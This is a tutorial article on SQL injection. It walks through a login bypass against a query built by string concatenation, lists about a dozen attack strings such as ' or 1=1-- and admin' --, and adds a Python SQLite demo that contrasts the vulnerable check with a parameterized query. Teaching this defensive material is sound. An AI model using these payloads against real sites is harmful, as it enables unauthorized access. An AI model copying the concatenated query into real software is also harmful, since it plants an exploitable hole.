SQL Injection
What is SQL Injection?
SQL Injection is a vulnerability in which attacker-controlled input is placed into a database query and changes the meaning of that query. A common result is bypassing username and password checks, potentially giving access to information that would normally be restricted. SQL Injection generally affects the database layer of a site.
Triggering an SQL Injection
Suppose we had a login check that built its SQL query directly from user input as follows (the values come from HTML form fields and are compared against database entries):
set successful = execute("SELECT * FROM tableOfUsers WHERE username='" & form("user")
                         & "' AND password='" & form("pwd") & "'");
if (not successful.EOF)
    login success;
else
    fail;
An attacker simply needs to enter the following text into the username field:
' or 1 = 1 --
This would cause the query sent to the database to be:
SELECT * FROM tableOfUsers WHERE username='' or 1 = 1 -- ' AND password='<whatever was typed>'
In SQL, '--' starts a comment that runs to the end of the line, so everything to the right of it, including the password check, is ignored. The condition that remains, username='' or 1 = 1, is true for every row because 1 is always equal to 1, so the query returns rows and the login succeeds. The attacker can now log in without knowing the user's password. This is why it is important to properly handle user input before it reaches the database.
SQL Attack Strings
The following are some examples of SQL Attack Strings:
' or 1=1 or ''='
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--
" or 1=1--
or 1=1--
admin' --
admin' #
admin'/*
' UNION SELECT 1, 'username', 'password', 1--
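The following is an added example, not code from the original article: the concatenating login check from the "Triggering an SQL Injection" section rebuilt in Python against an in-memory SQLite database, placed next to a parameterized version of the same query, and run against a few of the attack strings listed above. Python and the sqlite3 module are assumptions for the demo; the table name and column names follow the article, and the two accounts are constructed sample data. Passwords are compared as plain text only to keep the injection point isolated, as the article does; a real system would store and compare password hashes. Parameterized queries, as shown in login_safe, are the standard mitigation, because the database receives the user's text as a value and never as part of the SQL.

```python
# Added example (not code from the original article): the article's concatenating
# login check in Python against an in-memory SQLite database, next to a
# parameterized version. Table and column names follow the article; the sample
# users and passwords are constructed for this demo.
import sqlite3


def make_db():
    """Create an in-memory database with tableOfUsers and two constructed accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tableOfUsers (username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO tableOfUsers (username, password) VALUES (?, ?)",
        [("admin", "correct-horse"), ("alice", "s3cret")],
    )
    conn.commit()
    return conn


def login_vulnerable(conn, user, pwd):
    """The article's pattern: form values concatenated straight into the query text.

    Whatever the fields contain becomes SQL, so quotes and comment markers in the
    input are interpreted by the database instead of being compared as data.
    """
    query = ("SELECT * FROM tableOfUsers WHERE username='" + user
             + "' AND password='" + pwd + "'")
    try:
        row = conn.execute(query).fetchone()
    except sqlite3.Error:
        # A payload that breaks the syntax simply fails the login here; in a real
        # application the resulting database error is itself worth logging and alerting on.
        return False
    return row is not None


def login_safe(conn, user, pwd):
    """Parameterized version: the query text is fixed and the values travel separately.

    The driver passes user and pwd to SQLite as bound values, never as SQL text,
    so an input such as ' or 1 = 1 -- is compared against the username column
    as a literal string and matches nothing.
    """
    query = "SELECT * FROM tableOfUsers WHERE username=? AND password=?"
    row = conn.execute(query, (user, pwd)).fetchone()
    return row is not None


def bypass_report(conn, payloads, pwd="wrong-password"):
    """Return {payload: (vulnerable_login_succeeded, safe_login_succeeded)}.

    Each payload is submitted as the username together with a password that
    matches no account, so a True anywhere means the check was bypassed.
    """
    return {p: (login_vulnerable(conn, p, pwd), login_safe(conn, p, pwd))
            for p in payloads}


# Three of the strings listed in the article, used here only to show which
# implementation each one defeats.
ARTICLE_PAYLOADS = ["' or 1 = 1 --", "admin' --", "' or 1=1--"]

if __name__ == "__main__":
    db = make_db()
    for payload, (vuln, safe) in bypass_report(db, ARTICLE_PAYLOADS).items():
        print(f"{payload!r:18} concatenated: {vuln}   parameterized: {safe}")
```

Running the script shows each listed string logging in through login_vulnerable and failing through login_safe, while correct credentials still work through both. The comment-based strings succeed against the concatenating version because SQLite, like the article's database, treats '--' as the start of a comment and discards the password check.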
Summary
Sites that use username and password fields in conjunction with SQL databases may simply have the above strings copied and pasted into those fields by an attacker, breaching their defenses. The site needs to make sure that it sanitizes input in order to avoid issues such as these. Note that there are more advanced SQL exploits using the UNION keyword.
Thank you for reading this article. If you have any suggestions or need clarification please do not hesitate to start a thread on my forum or to send me an e-mail. There is no such thing as a stupid question, but there is such a thing as a stupid fear of asking.